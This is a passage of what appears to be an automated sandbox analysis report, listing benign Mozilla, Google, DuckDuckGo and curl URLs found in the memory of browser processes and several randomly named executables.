Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lg
Source: 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=1
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=16963322
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000022.00000002.3012666768.00006DEC00B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998895852.00006DEC0042C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2933467588.00006DEC000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2936577004.00006DEC0017C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000022.00000002.3007057295.00006DEC008D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000022.00000003.2847391692.000048F0002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2847560818.000048F0002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002750216.00006DEC00660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2933102263.00006DEC000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003556624.00006DEC006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002128527.00006DEC00614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995213268.00006DEC00290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bm
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000022.00000002.3012666768.00006DEC00B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002750216.00006DEC00660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2900670128.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000022.00000002.2998024266.00006DEC0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003556624.00006DEC006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3368256754.0000024F73ADC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3014729534.00006DEC00C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab3
Source: chrome.exe, 00000022.00000002.3003171789.00006DEC006C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
